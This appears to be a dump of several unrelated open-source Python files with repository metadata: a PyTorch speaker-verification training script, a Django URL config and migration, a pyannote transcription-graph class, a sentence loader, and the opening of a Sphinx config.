'momentum': args.momentum}
l2_dist = nn.CosineSimilarity(dim=1, eps=1e-6) if args.cos_sim else PairwiseDistance(2)
if args.acoustic_feature == 'fbank':
transform = transforms.Compose([
concateinputfromMFB(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# varLengthFeat(),
to2tensor()
])
transform_T = transforms.Compose([
ConcateVarInput(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# to2tensor()
])
transform_V = transforms.Compose([
varLengthFeat(remove_vad=args.remove_vad),
to2tensor()
])
else:
transform = transforms.Compose([
truncatedinput(),
toMFB(),
totensor(),
# tonormal()
])
file_loader = read_audio
# pdb.set_trace()
torch.multiprocessing.set_sharing_strategy('file_system')
if args.feat_format == 'kaldi':
file_loader = read_mat
elif args.feat_format == 'npy':
file_loader = np.load
train_dir = EgsDataset(dir=args.train_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
test_dir = ScriptTestDataset(dir=args.test_dir, loader=np.load, transform=transform_T)
if len(test_dir) < args.veri_pairs:
args.veri_pairs = len(test_dir)
print('There are %d verification pairs.' % len(test_dir))
else:
test_dir.partition(args.veri_pairs)
valid_dir = EgsDataset(dir=args.valid_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
def main():
# Views the training images and displays the distance on anchor-negative and anchor-positive
# test_display_triplet_distance = False
# print the experiment configuration
print('\nCurrent time is \33[91m{}\33[0m.'.format(str(time.asctime())))
print('Parsed options: {}'.format(vars(args)))
print('Number of Speakers: {}.\n'.format(train_dir.num_spks))
# instantiate model and initialize weights
kernel_size = args.kernel_size.split(',')
kernel_size = [int(x) for x in kernel_size]
padding = [int((x - 1) / 2) for x in kernel_size]
kernel_size = tuple(kernel_size)
padding = tuple(padding)
channels = args.channels.split(',')
channels = [int(x) for x in channels]
model_kwargs = {'embedding_size_a': args.embedding_size_a,
'embedding_size_b': args.embedding_size_b,
'embedding_size_o': args.embedding_size_o,
'inst_norm': args.inst_norm,
'resnet_size': args.resnet_size,
'num_classes_a': train_dir.num_spks,
'num_classes_b': train_dir.num_doms,
'channels': channels,
'avg_size': args.avg_size,
'alpha': args.alpha,
'kernel_size': kernel_size,
'padding': padding,
'dropout_p': args.dropout_p}
print('Model options: {}'.format(model_kwargs))
model = create_model(args.model, **model_kwargs)
start_epoch = 0
if args.save_init and not args.finetune:
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, start_epoch)
torch.save(model, check_path)
if args.resume:
if os.path.isfile(args.resume):
print('=> loading checkpoint {}'.format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
filtered = {k: v for k, v in checkpoint['state_dict'].items() if 'num_batches_tracked' not in k}
model_dict = model.state_dict()
model_dict.update(filtered)
model.load_state_dict(model_dict)
#
# model.dropout.p = args.dropout_p
else:
print('=> no checkpoint found at {}'.format(args.resume))
ce_criterion = nn.CrossEntropyLoss()
if args.loss_type == 'soft':
xe_criterion = None
elif args.loss_type == 'asoft':
ce_criterion = None
model.classifier_spk = AngleLinear(in_features=args.embedding_size, out_features=train_dir.num_spks, m=args.m)
xe_criterion = AngleSoftmaxLoss(lambda_min=args.lambda_min, lambda_max=args.lambda_max)
elif args.loss_type == 'center':
xe_criterion = CenterLoss(num_classes=train_dir.num_spks, feat_dim=args.embedding_size)
elif args.loss_type == 'amsoft':
ce_criterion = None
model.classifier_spk = AdditiveMarginLinear(feat_dim=args.embedding_size, n_classes=train_dir.num_spks)
xe_criterion = AMSoftmaxLoss(margin=args.margin, s=args.s)
optimizer = create_optimizer(model.parameters(), args.optimizer, **opt_kwargs)
if args.loss_type == 'center':
optimizer = torch.optim.SGD([{'params': xe_criterion.parameters(), 'lr': args.lr * 5},
{'params': model.parameters()}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.finetune:
if args.loss_type == 'asoft' or args.loss_type == 'amsoft':
classifier_params = list(map(id, model.classifier.parameters()))
rest_params = filter(lambda p: id(p) not in classifier_params, model.parameters())
optimizer = torch.optim.SGD([{'params': model.classifier.parameters(), 'lr': args.lr * 5},
{'params': rest_params}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.scheduler == 'exp':
scheduler = ExponentialLR(optimizer, gamma=args.gamma)
else:
milestones = args.milestones.split(',')
milestones = [int(x) for x in milestones]
milestones.sort()
scheduler = MultiStepLR(optimizer, milestones=milestones, gamma=0.1)
ce = [ce_criterion, xe_criterion]
start = args.start_epoch + start_epoch
print('Start epoch is : ' + str(start))
# start = 0
end = start + args.epochs
train_loader = torch.utils.data.DataLoader(train_dir, batch_size=args.batch_size, shuffle=False, **kwargs)
valid_loader = torch.utils.data.DataLoader(valid_dir, batch_size=int(args.batch_size / 2), shuffle=False, **kwargs)
test_loader = torch.utils.data.DataLoader(test_dir, batch_size=args.test_batch_size, shuffle=False, **kwargs)
# sitw_test_loader = torch.utils.data.DataLoader(sitw_test_dir, batch_size=args.test_batch_size,
# shuffle=False, **kwargs)
# sitw_dev_loader = torch.utils.data.DataLoader(sitw_dev_part, batch_size=args.test_batch_size, shuffle=False,
# **kwargs)
if args.cuda:
model = model.cuda()
for i in range(len(ce)):
if ce[i] != None:
ce[i] = ce[i].cuda()
print('Dropout is {}.'.format(model.dropout_p))
for epoch in range(start, end):
# pdb.set_trace()
print('\n\33[1;34m Current \'{}\' learning rate is '.format(args.optimizer), end='')
for param_group in optimizer.param_groups:
print('{:.5f} '.format(param_group['lr']), end='')
print(' \33[0m')
if epoch % 2 == 1 and epoch != (end - 1):
test(test_loader, valid_loader, model, epoch)
train(train_loader, model, ce, optimizer, epoch)
if epoch % 4 == 1 or epoch == (end - 1):
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, epoch)
torch.save({'epoch': epoch,
'state_dict': model.state_dict(),
'criterion': ce},
check_path)
scheduler.step()
# exit(1)
extract_dir = KaldiExtractDataset(dir=args.test_dir, transform=transform_V, filer_loader=np.load)
extract_loader = torch.utils.data.DataLoader(extract_dir, batch_size=1, shuffle=False, **kwargs)
xvector_dir = args.check_path
xvector_dir = xvector_dir.replace('checkpoint', 'xvector')
verification_extract(extract_loader, model, xvector_dir)
verify_dir = ScriptVerifyDataset(dir=args.test_dir, trials_file=args.trials, xvectors_dir=xvector_dir,
loader=read_vec_flt)
verify_loader = torch.utils.data.DataLoader(verify_dir, batch_size=64, shuffle=False, **kwargs)
verification_test(test_loader=verify_loader, dist_type=('cos' if args.cos_sim else 'l2'),
log_interval=args.log_interval)
writer.close()
def train(train_loader, model, ce, optimizer, epoch):
# switch to evaluate mode
model.train()
lambda_ = 2. / (1 + np.exp(-10. * epoch / args.epochs)) - 1.
model.grl.set_lambda(lambda_)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
total_loss_a = 0.
total_loss_b = 0.
total_loss_c = 0.
total_loss = 0.
# for param_group in optimizer.param_groups:
# print('\33[1;34m Optimizer \'{}\' learning rate is {}.\33[0m'.format(args.optimizer, param_group['lr']))
ce_criterion, xe_criterion = ce
pbar = tqdm(enumerate(train_loader))
output_softmax = nn.Softmax(dim=1)
for batch_idx, (data, label_a, label_b) in pbar:
if args.cuda:
data = data.cuda()
data, label_a = Variable(data), Variable(label_a)
label_b = Variable(label_b)
logits_spk, feat_spk, logits_dom, feat_dom = model(data)
true_labels_a = label_a.cuda()
true_labels_b = label_b.cuda()
# pdb.set_trace()
# cos_theta, phi_theta = classfier
spk_label = logits_spk
dom_lable = logits_dom
if args.loss_type == 'soft':
spk_loss = ce_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'asoft':
spk_label, _ = spk_label
spk_loss = xe_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'center':
loss_cent = ce_criterion(logits_spk, true_labels_a)
loss_xent = xe_criterion(feat_spk, true_labels_a)
spk_loss = args.loss_ratio * loss_xent + loss_cent
elif args.loss_type == 'amsoft':
spk_loss = xe_criterion(logits_spk, true_labels_a)
dom_loss = (args.dom_ratio * ce_criterion(dom_lable, true_labels_b))
loss = spk_loss + dom_loss
if args.sim_ratio:
spk_dom_sim_loss = torch.cosine_similarity(feat_spk, feat_dom, dim=1).pow(2).mean()
spk_dom_sim_loss = args.sim_ratio * spk_dom_sim_loss
loss += spk_dom_sim_loss
predicted_labels_a = output_softmax(spk_label)
predicted_one_labels_a = torch.max(predicted_labels_a, dim=1)[1]
minibatch_correct_a = float((predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item())
minibatch_acc_a = minibatch_correct_a / len(predicted_one_labels_a)
correct_a += minibatch_correct_a
predicted_labels_b = output_softmax(dom_lable)
predicted_one_labels_b = torch.max(predicted_labels_b, dim=1)[1]
minibatch_correct_b = float((predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item())
minibatch_acc_b = minibatch_correct_b / len(predicted_one_labels_b)
correct_b += minibatch_correct_b
total_datasize += len(predicted_one_labels_a)
total_loss_a += float(spk_loss.item())
total_loss_b += float(dom_loss.item())
total_loss_c += float(spk_dom_sim_loss.item()) if args.sim_ratio else 0.
total_loss += float(loss.item())
# compute gradient and update weights
optimizer.zero_grad()
loss.backward()
if args.loss_type == 'center' and args.loss_ratio != 0:
for param in xe_criterion.parameters():
param.grad.data *= (1. / args.loss_ratio)
optimizer.step()
if batch_idx % args.log_interval == 0:
pbar.set_description(
'Train Epoch {:2d}: [{:4d}/{:4d}({:3.0f}%)] AvgLoss: {:.4f} SpkLoss: {:.4f} DomLoss: {:.4f} ' \
'SimLoss: {:.4f} Batch Accuracy: Spk: {:.4f}%, Dom: {:.4f}%'.format(
epoch,
batch_idx,
len(train_loader),
100. * batch_idx / len(train_loader),
total_loss / (batch_idx + 1),
total_loss_a / (batch_idx + 1),
total_loss_b / (batch_idx + 1),
total_loss_c / (batch_idx + 1),
100. * minibatch_acc_a,
100. * minibatch_acc_b))
print('\n\33[91mTrain Epoch {}: Avg loss: {:.4f} Spk Loss: {:.4f} Dom Loss: {:.4f} .'.format(epoch,
total_loss / len(
train_loader),
total_loss_a / len(
train_loader),
total_loss_b / len(
train_loader)))
print('Spk Accuracy:{:.4f}%, Dom Accuracy:{:.4f}%.\33[0m'.format(100 * correct_a / total_datasize,
100 * correct_b / total_datasize, ))
writer.add_scalar('Train/Spk_Accuracy', correct_a / total_datasize, epoch)
writer.add_scalar('Train/Dom_Accuracy', correct_b / total_datasize, epoch)
writer.add_scalar('Train/Loss', total_loss / len(train_loader), epoch)
torch.cuda.empty_cache()
def test(test_loader, valid_loader, model, epoch):
# switch to evaluate mode
model.eval()
valid_pbar = tqdm(enumerate(valid_loader))
softmax = nn.Softmax(dim=1)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
for batch_idx, (data, label_a, label_b) in valid_pbar:
data = Variable(data.cuda())
# compute output
out_a, _, out_b, _ = model(data)
if args.loss_type == 'asoft':
predicted_labels_a, _ = out_a
else:
predicted_labels_a = out_a
predicted_labels_b = out_b
true_labels_a = Variable(label_a.cuda())
true_labels_b = Variable(label_b.cuda())
# pdb.set_trace()
predicted_one_labels_a = softmax(predicted_labels_a)
predicted_one_labels_a = torch.max(predicted_one_labels_a, dim=1)[1]
batch_correct_a = (predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item()
minibatch_acc_a = float(batch_correct_a / len(predicted_one_labels_a))
correct_a += batch_correct_a
predicted_one_labels_b = softmax(predicted_labels_b)
predicted_one_labels_b = torch.max(predicted_one_labels_b, dim=1)[1]
batch_correct_b = (predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item()
minibatch_acc_b = float(batch_correct_b / len(predicted_one_labels_b))
correct_b += batch_correct_b
total_datasize += len(predicted_one_labels_a)
if batch_idx % args.log_interval == 0:
valid_pbar.set_description(
'Valid Epoch: {:2d} [{:8d}/{:8d} ({:3.0f}%)] Batch Spk Accuracy: {:.4f}% Dom Accuracy: {:.4f}%'.format(
epoch,
batch_idx * len(data),
len(valid_loader.dataset),
100. * batch_idx / len(valid_loader),
100. * minibatch_acc_a,
100. * minibatch_acc_b
))
spk_valid_accuracy = 100. * correct_a / total_datasize
dom_valid_accuracy = 100. * correct_b / total_datasize
writer.add_scalar('Test/Spk_Valid_Accuracy', spk_valid_accuracy, epoch)
writer.add_scalar('Test/Dom_Valid_Accuracy', dom_valid_accuracy, epoch)
torch.cuda.empty_cache()
labels, distances = [], []
pbar = tqdm(enumerate(test_loader))
for batch_idx, (data_a, data_p, label) in pbar:
vec_a_shape = data_a.shape
vec_p_shape = data_p.shape
# pdb.set_trace()
data_a = data_a.reshape(vec_a_shape[0] * vec_a_shape[1], 1, vec_a_shape[2], vec_a_shape[3])
data_p = data_p.reshape(vec_p_shape[0] * vec_p_shape[1], 1, vec_p_shape[2], vec_p_shape[3])
if args.cuda:
data_a, data_p = data_a.cuda(), data_p.cuda()
data_a, data_p, label = Variable(data_a), Variable(data_p), Variable(label)
# compute output
_, out_a_, _, _ = model(data_a)
_, out_p_, _, _ = model(data_p)
# out_a = out_a_
# out_p = out_p_
out_a = out_a_.reshape(vec_a_shape[0], vec_a_shape[1], args.embedding_size_a).mean(dim=1)
out_p = out_p_.reshape(vec_p_shape[0], vec_p_shape[1], args.embedding_size_a).mean(dim=1)
dists = l2_dist.forward(out_a, out_p) # torch.sqrt(torch.sum((out_a - out_p) ** 2, 1)) # euclidean distance
# dists = dists.reshape(vec_shape[0], vec_shape[1]).mean(dim=1)
dists = dists.data.cpu().numpy()
distances.append(dists)
labels.append(label.data.cpu().numpy())
if batch_idx % args.log_interval == 0:
pbar.set_description('Test Epoch: {} [{}/{} ({:.0f}%)]'.format(
epoch, batch_idx * len(data_a), len(test_loader.dataset), 100. * batch_idx / len(test_loader)))
labels = np.array([sublabel for label in labels for sublabel in label])
distances = np.array([subdist for dist in distances for subdist in dist])
eer, eer_threshold, accuracy = evaluate_kaldi_eer(distances, labels, cos=args.cos_sim, re_thre=True)
writer.add_scalar('Test/EER', 100. * eer, epoch)
writer.add_scalar('Test/Threshold', eer_threshold, epoch)
mindcf_01, mindcf_001 = evaluate_kaldi_mindcf(distances, labels)
writer.add_scalar('Test/mindcf-0.01', mindcf_01, epoch)
writer.add_scalar('Test/mindcf-0.001', mindcf_001, epoch)
dist_type = 'cos' if args.cos_sim else 'l2'
print('\nFor %s_distance, ' % dist_type)
print(' \33[91mTest Spk ERR is {:.4f}%, Threshold is {}'.format(100. * eer, eer_threshold))
print(' mindcf-0.01 {:.4f}, mindcf-0.001 {:.4f},'.format(mindcf_01, mindcf_001))
print(' Valid Spk Accuracy is %.4f %%, Dom Accuracy is %.4f %% .\33[0m' % (spk_valid_accuracy, dom_valid_accuracy))
torch.cuda.empty_cache()
if __name__ == '__main__':
main()
| 44.822556 | 120 | 0.63267 | [
"MIT"
] | Wenhao-Yang/DeepSpeaker-pytorch | TrainAndTest/Spectrogram/train_domres_egs.py | 29,807 | Python |
""" Contains the urls for the maingui module"""
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('login', views.login, name='login'),
]
| 20.4 | 47 | 0.661765 | [
"BSD-3-Clause"
] | edgarceron/agent_console | maingui/urls.py | 204 | Python |
#!/usr/bin/env python
# encoding: utf-8
# The MIT License (MIT)
# Copyright (c) 2014 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# AUTHORS
# Hervé BREDIN - http://herve.niderb.fr
from __future__ import unicode_literals
import networkx as nx
from networkx.readwrite.json_graph import node_link_data, node_link_graph
from time import T, TStart, TEnd
from segment import Segment
from json import PYANNOTE_JSON_TRANSCRIPTION
from util import pairwise
class Transcription(nx.MultiDiGraph):
"""Transcription stored as annotation graph"""
def __init__(self, graph=None, **attrs):
super(Transcription, self).__init__(data=graph)
self.graph.update(attrs)
def drifting(self):
"""Get list of drifting times"""
return [n for n in self if n.drifting]
def anchored(self):
"""Get list of anchored times"""
return [n for n in self if n.anchored]
def add_edge(self, t1, t2, key=None, attr_dict=None, **attrs):
"""Add annotation to the graph between times t1 and t2
Parameters
----------
t1, t2: float, str or None
data : dict, optional
{annotation_type: annotation_value} dictionary
Example
-------
>>> G = Transcription()
>>> G.add_edge(T(1.), T(), speaker='John', 'speech'='Hello world!')
"""
t1 = T(t1)
t2 = T(t2)
# make sure Ts are connected in correct chronological order
if t1.anchored and t2.anchored:
assert t1 <= t2
super(Transcription, self).add_edge(
t1, t2, key=key, attr_dict=attr_dict, **attrs)
def relabel_drifting_nodes(self, mapping=None):
"""Relabel drifting nodes
Parameters
----------
mapping : dict, optional
A dictionary with the old labels as keys and new labels as values.
Returns
-------
g : Transcription
New annotation graph
mapping : dict
A dictionary with the new labels as keys and old labels as values.
Can be used to get back to the version before relabelling.
"""
if mapping is None:
old2new = {n: T() for n in self.drifting()}
else:
old2new = dict(mapping)
new2old = {new: old for old, new in old2new.iteritems()}
return nx.relabel_nodes(self, old2new, copy=True), new2old
def crop(self, source, target=None):
"""Get minimum subgraph between source time and target time
Parameters
----------
source : Segment
target : float or str, optional
Returns
-------
g : Transcription
Sub-graph between source and target
"""
if isinstance(source, Segment):
source, target = source.start, source.end
source = T(source)
target = T(target)
# sorted list of anchored times will be needed later
# make sure it is computed only once
if source.anchored or target.anchored:
anchored = sorted(self.anchored())
# ~~~ from_source = set of nodes reachable from source ~~~~~~~~~~~~~~~~
# source is drifting
if source.drifting:
if source not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % source)
else:
from_source = {source} | nx.algorithms.descendants(self, source)
# source is anchored
else:
# if source is in graph, then it is easy
if source in self:
from_source = {source} | nx.algorithms.descendants(self, source)
# if source is not in graph,
# find anchored time just before source
else:
if source < anchored[0]:
from_source = set(self) # take no risk!
else:
before = [n for n in anchored if n <= source][-1]
from_source = {before} | nx.algorithms.descendants(self, before)
# ~~~ to_target = set of nodes from which target is reachable ~~~~~~~~~
# target is drifting
if target.drifting:
if target not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % target)
else:
to_target = {target} | nx.algorithms.ancestors(self, target)
else:
# if target is in graph, then it is easy
if target in self:
to_target = {target} | nx.algorithms.ancestors(self, target)
# if target is not in graph,
# find anchored time just after target
else:
if target > anchored[-1]:
to_target = set(self) # take no risk!
else:
after = [n for n in anchored if n >= target][0]
to_target = {after} | nx.algorithms.ancestors(self, after)
# union of source, target and source-to-target paths
nbunch = from_source & to_target
return self.subgraph(nbunch)
# =========================================================================
def _merge(self, drifting_t, another_t):
"""Helper function to merge `drifting_t` with `another_t`
Assumes that both `drifting_t` and `another_t` exists.
Also assumes that `drifting_t` is an instance of `TFloating`
(otherwise, this might lead to weird graph configuration)
Parameters
----------
drifting_t :
Existing drifting time in graph
another_t :
Existing time in graph
"""
# drifting_t and another_t must exist in graph
# add a (t --> another_t) edge for each (t --> drifting_t) edge
for t, _, key, data in self.in_edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(t, another_t, key=key):
key = None
self.add_edge(t, another_t, key=key, attr_dict=data)
# add a (another_t --> t) edge for each (drifting_t --> t) edge
for _, t, key, data in self.edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(another_t, t, key=key):
key = None
self.add_edge(another_t, t, key=key, attr_dict=data)
# remove drifting_t node (as it was replaced by another_t)
self.remove_node(drifting_t)
def anchor(self, drifting_t, anchored_t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ D ] -- o ==> o -- [ A ] -- o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Anchor `drifting_t` at `anchored_t`
Parameters
----------
drifting_t :
Drifting time to anchor
anchored_t :
When to anchor `drifting_t`
"""
drifting_t = T(drifting_t)
anchored_t = T(anchored_t)
assert (drifting_t in self) and (drifting_t.drifting)
assert anchored_t.anchored
if anchored_t not in self:
self.add_node(anchored_t)
self._merge(drifting_t, anchored_t)
def align(self, one_t, another_t):
"""
Align two (potentially drifting) times
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ F ] -- o o o
⟍ ⟋
==> [ F ]
⟋ ⟍
o -- [ f ] -- o o o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Parameters
----------
one_t, another_t
Two times to be aligned.
Notes
-----
* If both `one_t` and `another_t` are drifting, the resulting graph
will no longer contain `one_t`.
* In case `another_t` is anchored, `align` is equivalent to `anchor`.
* `one_t` and `another_t` cannot be both anchored.
"""
one_t = T(one_t)
another_t = T(another_t)
assert one_t in self
assert another_t in self
# first time is drifting
if one_t.drifting:
self._merge(one_t, another_t)
# second time is drifting
elif another_t.drifting:
self._merge(another_t, one_t)
# both times are anchored --> FAIL
else:
raise ValueError(
'Cannot align two anchored times')
# =========================================================================
def pre_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
p -- [ t1 ] p [ t1 ]
⟍ ⟋
==> [ t ]
⟋ ⟍
p' -- [ t2 ] p' [ t2 ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure --[t1] incoming edges are empty
# because they're going to be removed afterwards,
# and we don't want to loose data
pred1 = self.predecessors(t1)
for p in pred1:
for key, data in self[p][t1].iteritems():
assert not data
# make sure --[t2] incoming edges are empty
# (for the same reason...)
pred2 = self.predecessors(t2)
for p in pred2:
for key, data in self[p][t2].iteritems():
assert not data
# let's get started (remove all incoming edges)
for p in pred1:
for key in list(self[p][t1]):
self.remove_edge(p, t1, key=key)
for p in pred2:
for key in list(self[p][t2]):
self.remove_edge(p, t2, key=key)
for p in set(pred1) | set(pred2):
self.add_edge(p, t)
self.add_edge(t, t1)
self.add_edge(t, t2)
def post_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ t1 ] -- s [ t1 ] s
⟍ ⟋
==> [ t ]
⟋ ⟍
[ t2 ] -- s' [ t2 ] s'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure [t1]-- outgoing edges are empty
# because they're going to be removed afterwards,
# and we don't want to loose data
succ1 = self.successors(t1)
for s in succ1:
for key, data in self[t1][s].iteritems():
assert not data
# make sure --[t2] outgoing edges are empty
# (for the same reason...)
succ2 = self.successors(t2)
for s in succ2:
for key, data in self[t2][s].iteritems():
assert not data
# let's get started (remove all outgoing edges)
for s in succ1:
for key in list(self[t1][s]):
self.remove_edge(t1, s, key=key)
for s in succ2:
for key in list(self[t2][s]):
self.remove_edge(t2, s, key=key)
for s in set(succ1) | set(succ2):
self.add_edge(t, s)
self.add_edge(t1, t)
self.add_edge(t2, t)
# =========================================================================
def ordering_graph(self):
"""Ordering graph
t1 --> t2 in the ordering graph indicates that t1 happens before t2.
A missing edge simply means that it is not clear yet.
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect every pair of anchored times
anchored = sorted(self.anchored())
for t1, t2 in itertools.combinations(anchored, 2):
g.add_edge(t1, t2)
# connect every time with its sucessors
_g = g.copy()
for t1 in _g:
for t2 in set([target for (_, target) in nx.bfs_edges(_g, t1)]):
g.add_edge(t1, t2)
return g
def temporal_sort(self):
"""Get nodes sorted in temporal order
Remark
------
This relies on a combination of temporal ordering of anchored times
and topological ordering for drifting times.
To be 100% sure that one drifting time happens before another time,
check the ordering graph (method .ordering_graph()).
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect pairs of consecutive anchored times
anchored = sorted(self.anchored())
for t1, t2 in pairwise(anchored):
g.add_edge(t1, t2)
return nx.topological_sort(g)
# =========================================================================
def ordered_edges_iter(self, nbunch=None, data=False, keys=False):
"""Return an iterator over the edges in temporal order.
Ordered edges are returned as tuples with optional data and keys
in the order (t1, t2, key, data).
Parameters
----------
nbunch : iterable container, optional (default= all nodes)
A container of nodes. The container will be iterated
through once.
data : bool, optional (default=False)
If True, return edge attribute dict with each edge.
keys : bool, optional (default=False)
If True, return edge keys with each edge.
Returns
-------
edge_iter : iterator
An iterator of (u,v), (u,v,d) or (u,v,key,d) tuples of edges.
Notes
-----
Nodes in nbunch that are not in the graph will be (quietly) ignored.
For the same reason you should not completely trust temporal_sort,
use ordered_edges_iter with care.
"""
# start by sorting nodes in temporal order
nodes = self.temporal_sort()
# only keep nbunch subset (while preserving the order)
if nbunch:
nbunch = list(nbunch)
nodes = [n for n in nodes if n in nbunch]
# iterate over edges using temporal order
return self.edges_iter(nbunch=nodes, data=data, keys=keys)
# =========================================================================
def timerange(self, t1, t2, inside=True, sort=None):
"""Infer edge timerange from graph structure
a -- ... -- [ t1 ] -- A -- ... -- B -- [ t2 ] -- ... -- b
==> [a, b] (inside=False) or [A, B] (inside=True)
Parameters
----------
t1, t2 : anchored or drifting times
inside : boolean, optional
Returns
-------
segment : Segment
"""
t1 = T(t1)
t2 = T(t2)
# in case it is not provided, compute temporal sort
if sort is None:
sort = self.temporal_sort()
# if edge start is anchored, use it as start time
if t1.anchored:
start = t1
# otherwise, look for the closest anchored time in temporal order:
# - just after if inside is True
# - just before otherwise
else:
start = None
# find time index in temporal sort
istart = sort.index(t1)
# search just before or just after depending on 'inside' value
search = sort[istart+1:] if inside else sort[istart-1::-1]
for t in search:
if t.anchored:
start = t
break
# if we could not find any anchored time
# use document end of start depending on 'inside' value
if start is None:
start = TEnd if inside else TStart
# same treatment for the other end of edge
if t2.anchored:
end = t2
else:
end = None
iend = sort.index(t2)
search = sort[iend-1::-1] if inside else sort[iend+1:]
for t in search:
if t.anchored:
end = t
break
if end is None:
end = TStart if inside else TEnd
# return a 'Segment'
return Segment(start=start, end=end)
# =========================================================================
def for_json(self):
return {PYANNOTE_JSON_TRANSCRIPTION: node_link_data(self)}
@classmethod
def from_json(cls, data):
graph = node_link_graph(data[PYANNOTE_JSON_TRANSCRIPTION])
mapping = {node: T(node) for node in graph}
graph = nx.relabel_nodes(graph, mapping)
return cls(graph=graph, **graph.graph)
# === IPython Notebook displays ===========================================
def _repr_svg_(self):
from notebook import repr_transcription
return repr_transcription(self)
| 31.545611 | 84 | 0.522261 | [
"MIT"
] | Parisson/pyannote-core | pyannote/core/transcription.py | 18,353 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 09:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lowfat', '0144_auto_20190123_1534'),
]
operations = [
migrations.AddField(
model_name='fund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='fund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
migrations.AddField(
model_name='historicalfund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='historicalfund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
]
| 26.684211 | 49 | 0.573964 | [
"BSD-3-Clause"
] | elena-kolomeets/lowfat | lowfat/migrations/0145_auto_20181213_0921.py | 1,014 | Python |
#!/bin/python
"""
This is a class for loading input sentences
"""
class SentenceAttr:
def __init__(self, attr_list):
self.article_id = attr_list[1]
self.title = attr_list[2]
self.sentence = attr_list[3]
self.article_structure = attr_list[4]
self.place = attr_list[5]
def __str__(self):
return "Article Id: " + self.article_id + "\n" + "Title: " + self.title + "\n"\
+"Sentence: " + self.sentence + "\n" +\
"Article Structure: " + self.article_structure + "\n" + "Place: " + self.place + "\n"
class LoadSentences:
def __init__(self, filepath, num):
self.filepath = filepath
self.num = num
"""对导入的文本做简单清洗"""
def Process(self, line):
line = line.replace('\n', '')
line_list = line.split("|")
return SentenceAttr(line_list)
"""逐行读取文件并返回迭代器"""
def Reader(self):
f = open(self.filepath)
line = f.readline()
count = 0
while line:
if count == self.num:
break
yield self.Process(line)
line = f.readline()
count += 1
f.close()
def test():
sentences_path = "../0_output.txt0.txt"
sentences = LoadSentences(sentences_path, 5).Reader()
for each in sentences:
print(each)
if __name__ == "__main__":
test()
| 24.263158 | 102 | 0.54953 | [
"MIT"
] | lychyzclc/High-throughput-relation-extraction-algorithm | src/util/load_sentence.py | 1,429 | Python |
#!/usr/bin/env python
#
# sqpdfo documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
